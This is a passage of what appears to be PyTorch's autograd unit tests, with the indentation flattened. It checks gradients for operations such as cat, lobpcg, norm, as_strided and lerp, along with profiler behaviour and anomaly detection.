run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor, check_forward_ad=True)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_as_strided(self):
def test(x, prepro_fn, size, strides, offset=None):
x = x.to(torch.double).detach().requires_grad_()
# Check that forward will **not** resize storage because it may
# cause NaN in output and fail numerical Jacobian check consequently
with torch.no_grad():
y = prepro_fn(x) if prepro_fn is not None else x
max_offset = sum((si - 1) * st for si, st in zip(size, strides))
max_offset += offset if offset is not None else y.storage_offset()
assert max_offset < len(y.storage()), "test case resizes storage"
def closure(x):
if prepro_fn is not None:
x = prepro_fn(x)
return x.as_strided(size, strides, offset)
gradcheck(closure, [x])
gradgradcheck(closure, [x])
# test
test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
# test crazy stride at dim with size 1 case
test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
# test expand case
test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
# test non-expand overlapping case
test(torch.randn(35), None, [6, 6], [5, 1], 2)
test(torch.randn(15), None, [3, 2], [3, 6], 2)
# test transpose case
test(torch.randn(3, 4), None, [4, 3], [1, 4])
# test "getting things outside the input" case
x = torch.randn(6, 2)
test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros
self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
# test select on expanded input case
test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
